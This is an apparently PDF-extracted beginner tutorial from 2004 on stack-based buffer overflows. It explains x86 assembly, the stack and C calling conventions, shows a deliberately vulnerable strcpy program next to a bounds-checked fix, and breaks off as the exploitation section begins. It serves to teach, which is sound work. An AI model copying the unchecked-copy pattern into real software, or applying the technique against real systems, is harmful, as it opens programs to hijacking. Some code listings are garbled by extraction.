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Buffer Overflows Complete

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Buffer Overflows Complete 2004/Oct/8

Buffer Overflows Complete

By detach at hackaholic.org (Rob klein Gunnewiek)

This paper is released under the Creative Commons Attribution-NonCommercial-


This paper covers buffer overflows for beginners. No previous knowledge of

programming is required, but if you do you can skip to chapter 2. User-level
knowledge of Unix or Linux (and access to such a machine with compiler) is

The buffer overflow exploit falls under the class of memory manipulation exploits,
meaning that these bugs are exploited by changing memory inside a process.
Through a programming error (bug) it is possible to change memory inside a
process. To master this type of exploitation, you should learn to program in both C
and assembly. You can start by studying and practicing this paper and then refer
to one of the more advanced texts on buffer overflows linked at the end of this

In buffer overflows and similar exploitation techniques, we want to take over

control of a process (a running program) in the most reliable way possible. For this
we need to do several things:

● Have something we want the faulty process to execute

● Have a reliable way to let the process execute this

This is what this paper will explain. But before we can do this, we need to
understand what buffer overflow vulnerabilities are, which is explained next.

1. Understanding buffer overflows 2004/Oct/8

1. Understanding buffer overflows

Lower-level programming languages like C and assembly require the programmer

to handle a most of memory allocation by hand, while higher-level languages such
as Java, Perl, Python handle this for the programmer. For example, in Python, the
programmer doesn't need to allocate a buffer before reading input, for example:

import sys
input = sys.stdin.read()

The variable 'input' is created on the fly, it will take an arbitrary length text as
input, until an End Of File character is read. When programming in lower-level
languages like assembly or C it's not that simple. In C one could do:

char input[100];

As you may know, in modern computer systems, 1 byte is the smallest

addressable storage unit. A string is nothing but a continuous stream of bytes1, or
character array. Each character takes 1 byte.

Using Python, we could input just as many characters we want until the memory is
exhausted, Python handles the dynamic allocation of memory for you. In the
above C example we allocate a buffer of 100 bytes, we read characters from
standard input and store those in the variable "input".

The buffer overflow vulnerability, as the name suggests overflows a buffer of a

fixed size. When bytes are read and written to a fixed-size buffer without regards
of the amount of data being written, you could overwrite data outside the fixed-
size buffer. Depending on the type of memory region that is overwritten, this
could crash the program. What is less apparent is that when understood
completely what is overwritten, attackers may carefully overwrite memory
regions in order to control the process. Some of such memory regions are called
the stack and the heap. In this paper I will only cover stack-based buffer
overflows, but many things learned from this you will need to exploit other types
of vulnerabilities such as heap overflows. The nature of the stack is very different
though, so actual exploitation is different. 

In order to understand how to exploit stack-based buffer overflows you will need
to understand C functions, a little assembly and how the stack memory really

1 Though in C a string (character array) ends with a NUL­byte (\0) which is not necessarily true for other languages

1. Understanding buffer overflows 2004/Oct/8

1.1. Assembly

When compiling C programs, the process of compiling involves several stages

until the program is fully converted to machine code and linked to shared
libraries. The first stage of compiling involves the preprocessor, where any
definitions and other items are resolved and replaced by constants. Then the C
compiler is invoked, which converts the C code to assembly code. The assembly
code is then converted to machine code by the assembler which produces an
object file. This object file already contains the machine code, but it needs to be
linked in order to be executable, this is done using the linker (usually 'ld').

Assembly is a very low-level (meaning, close to machine-level) programming

language. The C compiler tries to translate C code to efficient assembly code
which can then be easily converted to machine code using the assembler2. An
operating system such as GNU/Linux has GCC (GNU Compiler Collection) and GAS
(GNU Assembler) assemblers for this. In this paper, when we use assembly we use
GAS assembly syntax (AT&T style) to avoid confusion. Another popular assembler
is NASM (Netwide Assembler), which uses the Intel assembly syntax. The
difference is just another way of writing down the assembly code, but the essence
is the same. We use the GAS syntax because we will be using GDB (GNU
Debugger) later which is also AT&T syntax.

Let's write a very simple assembly program that just returns the value 2:

.globl main
.type main, @function
pushl %ebp
movl %esp, %ebp
movl $2, %eax

The program above is incredibly easy, however to entirely understand this

requires some explanation. You need to know about addressing modes,
mnemonics, instructions, endianess, registers, and so on. I will attempt to explain
this as easy as possible, but if you don't quite get it the first time you should
check out the references at the end of this paper to educate yourself.

The PC and PC clones all use the old Intel CPU (Central Processing Unit, or

2It is of course possible to write all programs in assembly directly, but that is
mainly a thing of the past. In this paragraph I introduce you to assembly and don't
worry, we will be writing machine code later too.

1. Understanding buffer overflows 2004/Oct/8

Processor) Architecture. Modern PCs are referred to as IA32 (Intel Architecture 32-
bits) or (even more modern) IA64 (64 bits), but also x86 or i386 (generic Intel 386
compatibles). There are many other CPU architectures such as SPARC, PowerPC,
MIPS and Alpha.

In this paper we concentrate on the Intel 32-bit processors and compatibles (such
as AMD processors ofcourse). The assembly language is always specific to the
CPU platform, so if you want to attack other platforms, you need to learn that
platform's assembly language first3. In practice, assembly language programming
also differs among operating systems, because we need to use operating system
services. In this paper we focus on the GNU/Linux operating system. You will need
to have GCC installed.

From a programmers perspective a CPU offers the following aspects for

programming. These will be covered in this section:

● Registers
● Instructions
● Addressing modes


A processor has registers4 in which values of a fixed size can be stored. On 32-bit
CPUs these registers are 32-bit in size, so you can store a value with maximum
value of 2^32-1. For backward-compatibility, Intel architecture still has 8-bit and
16-bit registers, but these are just part of 32-bit registers (yes, “different”
registers overlap!). Intel calls these registers on 32-bit CPUs “extended registers”.
We will get back at that.

There are multiple types of registers, some are special and cannot be used
directly, others are “general purpose” registers which the programmer can use to
store temporary values. Registers are used to keep track of states, temporary
values, pointers (address of) to memory locations, etcetera.

To an assembly programmer, each register has a name. The following table shows
all general- and special-purpose registers of an Intel CPU:

3 Note that most generic information contained here goes for all CPU platforms.
4 Also called accumulators

1. Understanding buffer overflows 2004/Oct/8

General Purpose Registers EAX
Special Purpose Registers EBP

The “E” before each register name stands for Extended (which means, before
80386 these were 16-bit registers AX, BX, CX, etcetera; and AX can be divided
once again into AL and AH 8-bit registers). The special purpose registers are often
used by the CPU itself. For example, EIP is the Instruction Pointer, a.k.a. Program
Counter which contains the memory address of the next instruction to be
executed in a program. The EFLAGS register contains bits where each bit contains
a status code.

With certain instruction (instructions are explained in the next paragraph) you can
write values to registers, and other instructions can be used perform
computations on the values in registers. Results of the computations can then be
stored in another register.

The EFLAGS register is especially interesting, it is rarely accessed directly, often

the instructions use them to store or retrieve the state. For example it can be
used to set and determine whether a condition was true or false. Each status flag
can only be zero or one, taking exactly one bit.


There are several types of instructions, most instructions perform some kind of
arithmetic on values in registers. Values can be given in different ways which is
determined by the addressing mode. It varies per instruction, as to which
addressing modes it supports. A processor is given instructions using the
instruction's opcode (operation code). Opcodes are just numeric codes that are
uniquely assigned to each instruction, those can be looked up in Intel's processor
manuals. The assembly programmer does not have to lookup the opcodes,

1. Understanding buffer overflows 2004/Oct/8

opcodes are given by using mnemonics, which are just names for instructions. The
assembler translates those mnemonics to their opcodes (machine code), just like
registers are also mnemonics to the programmer, the name “eax” is translated to
the register code.

The processor has many instructions, many of which are not essential in order for
the computer to work, as a computer would only need several basic building
blocks such as AND, OR, XOR and such, however to improve speed and to simplify
things, the CPU has many instructions. Each instruction needs 1 or more CPU
cycles (CPU clock cycles) to execute, which entirely depends on the type of
instruction and can be looked up in Intel's manuals.

Some common Intel instructions are:

Instruction Description
movl copy 32­bit digit to another location
addl add 32­bit digit to value in another location
cmpl compare 32­bit digit to another 32­bit digit
decl decrement 32­bit digit from another 32­bit digit
imull multiply 32­bit digit by another 32­bit digit

There are of course many more instructions, these were just an example. Often
there are instructions that are optimized for more special tasks that run faster
then when the programmer were to use multiple general-purpose instructions.

The 'l' (L) appended to movl and addl indicates that the given value is of type
“long”, meaning that it is 32-bit (4 bytes). If you would want to work with 8-bit
bytes you could use movb for example. It is important that this “information” is
embedded in the instruction because the processor otherwise cannot tell whether
it should treat the next 8-bits or next 32-bits as an argument value (called an
operand). This is one difference between NASM and GAS, as with NASM, the
assembler will “guess” the size of your values and use the correct opcode.

So the operand size and the instruction are encoded into one opcode, so the
processor knows different variants of for example 'mov'.

Addressing modes

Instructions that take operands need to know the type of operand. In the

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processor this is solved similarly as the operand-size method; have a different

opcode for different sizes. In the same way, each instruction has variants for
different types of operands. These different types are determined by the
addressing mode used. For example, with the MOV instruction you could copy
something from memory to a register, for exactly this operation (copying from
memory to register) there is a specific opcode. For the MOV instruction alone
there are many different opcodes covering every possible addressing mode. As
you can imagine, this way there are hundreds of opcodes in use in an intel
processor. And understanding how these opcodes are built gets extremely
complex. However when dealing with assembly language we don't have to cope
with that kind of detail. I identify the following 6 addressing modes which are used
in assembler:

● Register addressing
● Immediate addressing
● Direct addressing
● Indirect addressing
● Basepointer addressing
● Indexed addressing

These addressing modes can be used as operands to instructions, if these

instructions support them ofcourse. The MOV instruction for example, can use any
of the above addressing modes. Basically, these addressing modes tell the
compiler which variant of the instruction should be used, meaning the right
operand. The processor will then know how to access the operands in question.
For example, sometimes an operand will be a code of a register, another time it
can be an immediate value, so it is necessary so that the processor knows how to
handle the operand or things will go mad.

Register addressing mode

The register addressing mode is quite easy, you copy a value in one register into
another register. You tell the assembler to use the register mode by putting a
percent-sign before the register name. For example:

movl %eax, %ebx

Immediate addressing mode

In immediate addressing mode, the given operand is not a reference to a value,

but the value itself, which is even easier. In the following example we will write
the immediate value of 1 to the register EAX:

1. Understanding buffer overflows 2004/Oct/8

movl $1, %eax

The immediate value is denoted with the dollar-sign, while the registers are
denoted with the percent-sign. Our notation of the immediate value is decimal,
but we can also use other notations such as hexadecimal (ofcourse, the processor
doesn't care how you gave the operand value to the assembler):

movl $0x1, %eax

In assembly and in C you usually use 0x to denote a hexadecimal number.

Direct addressing mode

Direct addressing mode is accessed by memory address, it's as simple as that. In

case of the MOV instruction, which requires two operands, we could copy a value
from memory into a register. This could be done like so, where the first operand is
in direct addressing mode:

movl 0x00000000, %eax

In this example, the value at memory address 0 is copied to register EAX. The %-
sign tells the assembler that the second operand is in register mode. As you can
see our address is given as a hexa-decimal number, which is common at this level
of programming. The direct addressing mode is the default mode, as becomes
apparent when you see that no special sign is used to tell the assembler we are
using direct addressing mode. Also note that it is not possible to directly copy
from one memory address to another. If that is what you want you first need to
read it into a register and then from a register into a memory address.

Indirect addressing mode

In indirect addressing mode, the operand contains a name of a register enclosed

by parentheses. The value inside the register is interpreted as the direct address
to the memory that is addressed. Let's use the same example as above in indirect
addressing mode:

movl $0x00000000, %ebx # note the dollar-sign, we copy the value 0 to EBX
movl (%ebx), %eax # we now copy the value at address 0 to EAX

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Basepointer addressing mode

This addressing mode is very similar to the indirect addressing mode. The
basepointer addressing mode uses two values to calculate the real address, which
are the base address and the offset. The offset is added to the basepointer and
the result is the direct address to the requested value. The basepointer is inside a
register and is written between parentheses just like with indirect addressing
mode. The difference is that the offset is given before the parentheses. For

movl $0x00000000, %ebx

movl 4(%ebx), %eax

In this example we copy the value at address 0x00000004 to EAX.

Indexed addressing mode

Finally, indexed addressing is the most relatively complex addressing mode. The
absolute address is calculated using 3 values, 2 of which are required. It uses an
address, an index register and a multiplier. The value in the index register is
multiplied by the multiplier and then added to the address. In the following
example you will see a somewhat similar notation as with basepointer addressing,
but it works entirely different, what was an offset before, now is the absolute

movl $1, %ebx

movl 0x00000000(,%ebx,4), %eax

Now, this example is interesting. In the example EBX contains 1, 1 is multiplied by

4 which results in 4, this is added to the address resulting in 0x00000004.

As a programmer, the 0x00000000 address could be a start address of a buffer. In

this buffer could be elements of data that are 4-bytes long each. Now the
indexed-addressing method would be a good candidate, as we only need to know
the beginning of our buffer (0x00000000) and the number of the current element.
For example, if we want to access element 5, we could do:

movl $5, %ebx

movl 0x00000000(,%ebx,4), %eax

We would then access element 5, which is at location 0x00000014 (14h is 20

decimal). The above construction is ideal to use in loops, where you want to
access every value, like this:

1. Understanding buffer overflows 2004/Oct/8

movl $0, %ebx

movl $10, %ecx # count till loop ends

movl 0x00000000(,%ebx,4), %eax
addl $1, %ebx # increment EBX (count)
cmpl %ebx, %ecx # compare current count to maximum count in ECX
jne loop_start # if not equal to maximum count, continue next loop

Assembly language is not very difficult by itself, you get the fundamental building
blocks, you can write simple applications with it. If you understand assembly very
well and had a lot of practice you could write very fast running code. So assembly
language is often used in parts of programs that require speed. As you can
imagine, The C compiler (which turns C code into assembly) is not as efficient in
generating fast-running executable code than an experienced assembly
programmer. For example, let's write the above program as a real assembly
program which actually compiles:

.globl main
.type main, @function
pushl %ebp
movl %esp, %ebp
movl $0, %ebx
movl $10, %ecx

movl 0xbfffffd8(,%ebx,4), %eax
addl $1, %ebx
cmpl %ebx, %ecx
jne loop_start


It's not a very useful program, but that doesn't matter. When we translate this as
accurately as possible into C language I would write:

int main ()
register int a;
register int b = 0;
register int c = 10;
register unsigned long start_address = (long)0xbfffffd8;

a = (long) start_address + (b * 4);

1. Understanding buffer overflows 2004/Oct/8

b = b + 1;
} while (b < c);

return a;

We can compile this using “gcc loop.c -o loop”, but we can also tell GCC to only
compile the C program, meaning we will see the assembly code. Lets compare our
code with what gcc produces and not use optimization, we do this with -O0, which
gives us non-optimized code. This is necessary as GCC is smart enough to know
the program doesn't make any sense and will simply skip some code, which we do
not want.

$ gcc -O0 -S loop.c -o loop.S


The assembler code may differ from what you get, but this is what I get:

.file "loop.c"
.globl main
.type main, @function
pushl %ebp
movl %esp, %ebp
subl $24, %esp
andl $-16, %esp
movl $0, %eax
subl %eax, %esp
movl $0, -8(%ebp)
movl $10, -12(%ebp)
movl $-1073741864, -16(%ebp)
movl -8(%ebp), %eax
sall $2, %eax
movl -16(%ebp), %edx
addl %eax, %edx
movl %edx, -4(%ebp)
incl -8(%ebp)
movl -12(%ebp), %eax
cmpl %eax, -8(%ebp)
jl .L2
movl -4(%ebp), %eax
.size main, .-main
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU)

Many instructions in the above don't seem useful to me, or at least inefficient, but

1. Understanding buffer overflows 2004/Oct/8

as you can see it is possible to learn assembly by programming in C first, then

only compiling it to assembly. If you find it hard to understand that code, realize
that it is often this kind of code you need to work with. When you go into buffer
overflows or want to analyze closed-source software, there is no way around
reading automatically produced assembly code. Even worse is that you will not
have things such as labels which you can easily trace back (labels are like
“loop_start:”), but only absolute addresses in debuggers such as GDB. Output of
deadlisters (disassemblers) such as objdump are more easy to understand than
GDB output, because they will show labels as well.

Objdump output of my own assembly program looks like this:

08048334 <main>:
8048334: 55 push %ebp
8048335: 89 e5 mov %esp,%ebp
8048337: bb 00 00 00 00 mov $0x0,%ebx
804833c: b9 0a 00 00 00 mov $0xa,%ecx

08048341 <loop_start>:
8048341: 8b 04 9d d8 ff ff bf mov 0xbfffffd8(,%ebx,4),%eax
8048348: 83 c3 01 add $0x1,%ebx
804834b: 39 d9 cmp %ebx,%ecx
804834d: 75 f2 jne 8048341 <loop_start>
804834f: c9 leave
8048350: c3 ret

The first column shows the address of the code in memory when the program is
executing. The third column contains the disassembled machine-code.

What you see in the second column (the hex-numerics) are the real opcodes.
Notice that the mov opcode changes. If you look at address 8048337 for example,
you can see that the only opcode is 0xBB, and that the zeroes is the $0x0
operand. No mention of the EBX register operand, this is because there is a
special operand for the instruction which copies an immediate operand into
register EBX. Ofcourse, this is not what we need to worry about, because we can
just get this opcode information from objdump and GDB (which we will see later).

Okay, now we already have covered very concisely a lot about assembly
language. Before we get into buffer overflows, you need to understand functions
in C and how they translate to assembly first.

1.2. Functions

Normally instructions get executed sequentially, only certain instructions can tell
the processor to continue executing instructions at another location, such as the

1. Understanding buffer overflows 2004/Oct/8

jump (JMP) instruction (or the JNE instruction, which we have used in the former
paragraph). Sometimes this is also called changing the flow of execution. A
function call does this too.

A function call is done using the CALL instruction, other than a jump, it also does
some housekeeping, remembering important state information so that it can
return back to the instruction that follows the CALL instruction. Next to this
housekeeping information, the function that is being called can also return a
value, however this is implemented by C itself, using a canned method.

To return to the caller function (the code that calls another function is itself inside
a function) the instruction RET is used, which makes sure that caller can continue

The entire method C uses to implement function calls is called the C calling
convention, which we get back at in detail.

A C program can be built from dozens of small procedures called functions. One
function can call another function in the program. A program written in the C
language has at least one function called "main". The main function can call other
functions, and these functions typically return back to the caller function (main).

As you can imagine, a function typically performs a small job and then returns the
outcome of the operation. For example, one could have a function called "power"
which uses two values as input and returns the power of these two values. Upon
calling a function, the caller function can also give values to the function (such as
"power") as parameters.

Functions in C

In the C examples in the former section you already saw the use of a function,
probably without realizing it. That function was the required 1 function in C: main,
which contained the whole program. However, often a programmer wants to
reuse code or split a program in multiple tasks. The C language (and many other
programming languages) implement functions. In other programming languages
such as Pascal, such facilities may be implemented using “procedures”. Their
function is identical, but they are implemented and used differently. In the C
programming language, the function call syntax looks like this:

return_value = function_to_be_called (parameter);

In the above statement, the variable return_value would receive the value from
the function function_to_be_called. As you can see in the next example, the

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returned value will be 0:

int function_to_be_called(int parameter)

return 0;

Here is a more useful example program that has a function power:

int power (int, int); /* this is the function prototype,

* the real function comes after main () */

int main ()
int raised;

int x, y;

x = 2;
y = 2;

raised = power (x, y);

printf ("%d\n", raised);

return 0;

int power (int x, int y)

int i = y;
int return_value = 0;

while (i > 0)
return_value = return_value + (x * x);
i = i - 1;

return return_value;

It's not really important that you understand how the power function is
programmed, but I will explain. The power function multiplies x by x, y times,
while the results are summed up in return_value. At the end of the power
function, the return_value is returned to the caller function, which is main in this
example. Main then prints the return value raised to the screen.

1. Understanding buffer overflows 2004/Oct/8

The C calling convention

When calling a function in C arguments can be passed and return values returned,
how this is done in assembly is known as the C calling convention. This involves
the stack, which will be explained in this section.

Stack memory

In C there are different ways to store values and different ways to allocate buffers.
For example, some variables may only be required in a small part of a program,
others may be global and accessible from anywhere in the program. This has an
effect on where the variables get stored; the type of memory region. The stack is
one of those regions, most useful for storing local variables. Local variables in C
are local to a function, for example;

int main ()
int this_is_a_local_variable;

In the former paragraph you have also seen the use of the register variable:

int main()
register int this_is_stored_in_a_register;

In this case, the compiler will try to use a register for storing the variable, this is
most useful for variables that are used frequently, as it will speed up the process.
It is also possible to create a global variable, which is stored in another memory

int this_is_a_global_variable;

int main ()
this_is_a_global_variable = 1;

The global variable can be accessed by any function, in contrast of local variables.
To pass local variables, we use the C function call with arguments. The argument
can be a local variable, which is actually copied. For example you could do this:

int the_function_to_call (int the_parameter)


1. Understanding buffer overflows 2004/Oct/8

the_parameter = 1;

int main ()
int the_argument = 0;

the_function_to_call (the_argument);

// upon returning to main (), “the_argument” is still 0


So the variable the_argument doesn't change, because the_function_to_call

receives only a copy of the value the_argument, it is copied into a variable that is
local to the_function_to_call; upon returning, the variable is removed. This method
is called “call-by-value”.
A different method is call by reference. When using call-by-reference, the local
variable is still the local variable, but in that case main would give
the_function_to_call a pointer to its local variable the_argument, like this:

void the_function_to_call (int *the_parameter)

*the_parameter = 1;

int main ()
int the_argument = 0;

the_function_to_call (&the_argument); // a pointer to the_argument is given

// upon returning, “the_argument” is 1


As you can see, using call-by-reference the pointer (the address of the variable) is
given to the_function_to_call and this way will overwrite the value of main's local
variable the_argument. Please note that when the_function_to_call returns, only
the pointer (the address of the variable) is removed, but not the variable itself
because it is a local variable of main, not of the_function_to_call.


Now it is important to understand that local variables are stored on the stack. The
stack is a LIFO (Last In, First Out; like a pile of papers on your desk) memory

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mechanism mostly used for storing local temporary values. The stack allows a
programmer to store values for as long as a certain part (procedure) in the
program runs. To store values on the stack in the C language, you create local
variables. The stack is a memory area, but also specifically supported by your
processor by introducing several stack-specific instructions.

Stack-specific operation for using the LIFO mechanism is through the PUSH and
POP instructions. PUSH is like putting a paper on a pile of papers, POP to take off
the one on top. This facility is used by programming languages in different ways.
PUSH and POP (on some architectures called PULL) are notably useful for
temporarily storing register variables in the memory.
As the Intel architecture only has 8 registers (which we cannot all use), we can
only hold more variables by temporarily swapping them to memory and back,
using PUSH and POP for example. You may already have seen the use of PUSH
and POP, but these are explained later. Let's create an assembly program that
stores the contents of a register in memory:

.globl main
.type main, @function

pushl %ebp
movl %esp, %ebp

movl $1, %eax

movl $2, %ebx
pushl %eax
pushl %ebx
popl %eax
popl %ebx


The above program first puts the values 1 and 2 in EAX and EBX, respectively.
Then it does an exchange of the values, meaning that EAX will hold 2 and EBX
hold 1. This is done by first pushing the values of EAX and EBX onto the stack,
then popping them back in EAX and EBX in reverse. It happens in reverse because
the last PUSH pushed the value of EBX on top of the stack, then the next POP
popped the last value from the stack into EAX. This demonstrates perfectly well
how the PUSH and POP instructions work. But we are not there yet.

The stack pointer

PUSH and POP are nice features, but how do they work? In order to PUSH and

1. Understanding buffer overflows 2004/Oct/8

PULL values, the system needs to keep track of things:

● Allocation of memory
● Remembering the current position on the stack (the top)
● Knowing the start of the stack (the bottom)

The bottom is the easiest, the stack on GNU/Linux starts at memory address
0xc0000000, the operating system only needs to tell the processor. When you
push a value on top of the stack, the stack grows. On Intel processors the stack
grows downwards in terms of memory addresses. For example if you push a 4-
byte value onto the stack, the top of stack becomes 0xbffffffc. And when you POP
it back off, the top is again the bottom; 0xc0000000. This might be a bit
confusing, but it's not that hard. You know that 0xc0000000 is a lot more than
0x00000000, so there's a lot of space to grow downwards.

Now to keep track of at which memory location the top of the stack is, the
processor has a register called ESP (Extended Stack Pointer). It always points at
the top of the stack, the last value pushed onto it. When the stack pointer is
decreased, the stack grows larger, and when increased the memory address is
higher and the stack shrinks again. So, instead of the PUSH and PULL, we can just
do this ourselves:

.globl main
.type main, @function

pushl %ebp
movl %esp, %ebp

movl $1, %eax

movl $2, %ebx

subl $4, %esp

movl %eax, (%esp)
subl $4, %esp
movl %ebx, (%esp)

movl (%esp), %eax

addl $4, %esp
movl (%esp), %ebx
addl $4, %esp


As you can see, in order to expand the stack, we just decrease the value of the
stack pointer, increasing the stack space. We do this in 2 operations, each time

1. Understanding buffer overflows 2004/Oct/8

subtracting 4 bytes from the stack pointer, while we could have done this in one
operation and using basepointer addressing mode instead of indirect addressing
mode as used in the example above:

subl $8, %esp

movl %eax, 4(%esp)
movl %ebx, (%esp)

movl (%esp), %eax

movl 4(%esp), %ebx
addl $8, %esp

This is often how a good compiler works. Instead of using the CPU's PUSH and
POP, sometimes it is more efficient to just allocate memory for all local variables
and once, and later utilize movl to copy values to/from the stack. That's why you
don't see a compiler use PUSH and POP a lot.

Now you understand the basic operations for working with the stack, you are
ready to understand C function calls. Remember this is all essential in
understanding buffer overflow exploitation.

Function calls in assembly

I will just write a function and a call to a function as we did in C, but in assembly.
The code works like this C code:

int the_function_to_call (int the_parameter)

the_parameter = 1;
return 0;

int main ()
int the_argument;

the_argument = 0;

the_function_to_call (the_argument);

return 0;

Again, a totally useless program, but not for our explanation. The assembly code
looks like:


1. Understanding buffer overflows 2004/Oct/8

.globl main
.globl the_function_to_call
.type main, @function
.type the_function_to_call, @function

pushl %ebp
movl %esp, %ebp

movl $1, 8(%ebp) # the_parameter = 1

# return 0
movl $0, %eax

pushl %ebp
movl %esp, %ebp

subl $4, %esp # int the_argument

movl $0, (%esp) # the_argument = 0

# the argument to the_function_to_call: (the_argument)

movl (%esp), %eax
pushl %eax

call the_function_to_call

addl $8, %esp

# return 0
movl $0, %eax

Okay, in the main function the call to the_function_to_call is executed, before that
the arguments are provided for this function. The argument is passed to
the_function_to_call by just pushing it onto the stack. When there is more than
one argument, the arguments are pushed in reverse order, so that the last
argument is the furthest away from the current stack pointer

Now I can explain what these instructions do:

pushl %ebp
movl %esp, %ebp

I first need to introduce the EBP register. The EBP register is the Base-pointer or
Frame-pointer. The stack Frame-pointer always points to the beginning of a stack
frame. A stack frame is the stack memory in use by one procedure. When a

1. Understanding buffer overflows 2004/Oct/8

function finishes, the stack frame is freed again. Unlike the stack pointer, the
frame-pointer always points to the same memory as long as a function is
executing. This way, the frame-pointer is not really essential, but simplifies things
for a programmer, because a programmer only needs to use offsets from EBP,
instead of calculating the offset from the variable ESP. This also makes EBP ideal
for accessing parameters.

But, let's first discuss the example code snippet above. As you can see the EBP is
pushed onto the stack, this is done so that it can be popped again when the
function returns, effectively restoring the original state of EBP. After saving the
frame-pointer, we are at the start of the function. No local variables have been
reserved yet, so this is the start of the new stack frame for the new function.
Before we do anything else; the current top of the stack is the bottom of the new
frame, so we copy ESP to EBP. After this we can change ESP as we like without
losing track of the start of our stackframe.

Now, a similar method is used by the CALL instruction. The CALL instruction is
designed to jump into a new function, and later to return using the RET
instruction. When we jump out of the current function using CALL, the current
program counter (EIP) must be saved aswell. The CALL instruction does this
automatically, it stores the current EIP on the stack.

Now let's look at the stack when we call a function with three arguments:

towards bottom of stack (high memory argument 3

argument 2
argument 1
saved EIP (done automatically by CALL)
top of stack (low memory address) saved EBP (saved frame-pointer)

Here is a code snippet that would produce such a stack:

pushl %ecx # push argument 3

pushl %ebx # push argument 2
pushl %eax # push argument 1
call the_function

pushl %ebp # push main's frame-pointer
movl %esp, %ebp # the stackpointer points to the start of our frame,
# make it our framepointer

1. Understanding buffer overflows 2004/Oct/8

That's it. The CALL will push EIP before we push EBP. We're almost finished on
background information, you only need to understand how a function returns and
returns a value.

As this is very important to understand, I'll show the stack after each assembly

pushl %ecx

towards bottom of stack (high memory <rest of stack frame of main()>

top of stack (low memory address) argument 3

pushl %ebx

towards bottom of stack (high memory argument 3

top of stack (low memory address) argument 2

pushl %eax

towards bottom of stack (high memory argument 3

argument 2
top of stack (low memory address) argument 1

call the_function

towards bottom of stack (high memory argument 3

argument 2
argument 1
top of stack (low memory address) saved EIP (done automatically by CALL)

pushl %ebp

1. Understanding buffer overflows 2004/Oct/8

towards bottom of stack (high memory argument 3

argument 2
argument 1
saved EIP (done automatically by CALL)
top of stack (low memory address) saved EBP (saved frame-pointer)

After this pushl instruction, the current stackpointer is copied to the current
framepointer (ebp) so the top of the stack is the start of the stack frame of

A function can return with the RET instruction. But before that we need to restore
the caller's frame-pointer, so that it remains in the same state as before the CALL.
This can be done in two ways:


The LEAVE instruction will restore the frame-pointer, but we can also do it

popl %ebp

A function can return a value of 32-bit size by putting it in register EAX. This is
also part of the convention. The caller function can then just read EAX to receive
the return value. When main exits it also returns a value, you can see this in your
shell. For example if we run this program:

.globl main
.type main, @function
pushl %ebp
movl %esp, %ebp
movl $2, %eax

We run it:

$ ./return
$ echo $?

1. Understanding buffer overflows 2004/Oct/8

When running the program, a function in the BASH shell executes the program
and knows that the return value is in EAX. We can view the commands return
value using echo $?. As you know, the return value can be anything from an
integer to a pointer, you name it.

1.3 The buffer overflow

OK, I'm glad you made it this far, assuming you did. If you didn't, it's
understandable (I have covered a lot of information in several pages) and you
should work on assembly first by reading articles and books mentioned in ;the
references at the end of this paper. In this section I will show you what a buffer
overflow vulnerability is, and why this is a security vulnerability. You understand
now how the stack works and how function calls in C are translated to assembly.
Now you are ready to understand the impact of buffer overflows.

Consider the following C program:

int main (int count, char *argument[])

char buffer[100];

if (count < 2)
printf ("You need to give text as an argument, exiting\n");
exit (1);

strcpy (buffer, argument[1]);

return 0;

What it does is it creates a local variable called 'buffer', the variable is a character
array that can hold a 100 characters. Then the given argument is copied to the
100-byte buffer. The char argument[] are the arguments you can give on the
command-line to main, int count will hold the count of howmany arguments have
been passed. You can compile and execute this program like so:

$ gcc -o vulnerable vulnerable.c

$ ./vulnerable the_string_i_give_to_main

What does happen but we do not see, is that the_string_i_give_to_main is copied

to the 100-byte buffer. So what happens if the string is longer than 100-bytes?

1. Understanding buffer overflows 2004/Oct/8

Let's see what happens if we give 130 characters:

detach@devil:~$ ./vulnerable
Segmentation fault

When a program is loaded in memory, it is loaded as several memory segments

which are all put at different addresses. For example, the stack segment starts at
0xc0000000 as we have seen before. The program text (.text, which contains
executable code) starts at 0x08048000, these are virtual addresses, not physical
ones, as the Linux kernel has complete control over our programs and only
provides virtual memory access. When we try to access addresses such as
0x00000000, these are not accessible for the program and are outside any
segment of memory accessible to our program, so we get a segmentation fault.
But why does it access this illegal address?

Remember that a CALL instruction pushes EIP onto the stack and that RET can
then POP the saved EIP as the new EIP in order to go back to the caller function?
We call this saved EIP the return address, or ret (not to be confused with the RET
instruction). In the vulnerable program the stack looks like this;

towards bottom of stack (high memory char *argument[]

int count
saved EIP or ret (done automatically by
saved EBP (saved frame-pointer)
top of stack (lower memory address) char buffer[100]

Now the stack pointer points to buffer[100] like this:

towards end of buffer (higher memory buffer[n]

start of buffer, ESP points here buffer[0]

So this makes it all a little more complex. When you write to the buffer (the
character array), the buffer is copied byte by byte, starting at buffer[0]. But, even

1. Understanding buffer overflows 2004/Oct/8

though the buffer was defined as buffer[100], meaning that the last byte in buffer
is buffer[99], the strcpy function does not care and will happily write to buffer
[100] or buffer[124]! Just keep in mind that the allocated buffer buffer[100]
doesn't mean a thing to any functions such as strcpy, they don't care whether
buffer[123] was really allocated for buffer or not. As you should see by now, it will
happily overwrite saved EBP and saved EIP, not knowing this is outside the
allocated space of buffer! Once the function executes leave, the overwritten
saved frame-pointer becomes the new frame-pointer, and even worse, the
overwritten saved EIP becomes the new EIP! And once EIP is overwritten, the
processor will next start to execute instructions at non-existing memory
addresses (outside any valid segment), which happens when the RET instruction
is executed at the end of the function main. This is why the program crashes.

The strcpy function should only be used when the programmer is sure that the
source buffer is not larger than the allocated space of the destination buffer. The
end of the source buffer is determined by a NUL-byte, meaning a byte with the
value 0x0 (0). So when the source buffer is larger than the destination buffer, the
strcpy function will not find a NUL-byte before having read more bytes than the
destination buffer can hold. In other words, it is the programmer's responsibility to
make sure there is no potential buffer overflow. This is called bounds checking, a
programmer should always properly do bounds checking. Some functions such as
strncpy can be told howmany bytes to copy at most, so that a buffer overflow
could be prevented, like this:

int main (int count, char *argument[])

char buffer[100];

if (count < 2)
printf ("You need to give text as an argument, exiting\n");
exit (1);

/* copy a buffer with bounds checking */

strncpy (buffer, argument[1], 100);

return 0;

The above program will not crash when you input more than a 100 bytes, because
it will not read or write more than a 100 bytes:

$ ./copy

1. Understanding buffer overflows 2004/Oct/8

In the next section you will learn how to exploit this vulnerability to execute any
code you want.

2. Exploiting buffer overflows 2004/Oct/8

2. Exploiting buffer overflows

In section 1 the two requirements for exploiting buffer overflows were listed:

● Have something we want executed

● Have a way to let the process execute this

The second point was covered in section 1, namely by overwriting the return
address. In this section you will learn how to take advantage of this knowledge
and how to execute arbitrary code, the first point. We will overwrite the return
address so that it will execute our arbitrary code, which we supply. This can be
done in several ways, for example:

● Putting our code on the stack and execute this code, we call the method return-
● Using code already in the process address space, a loaded library, we call it

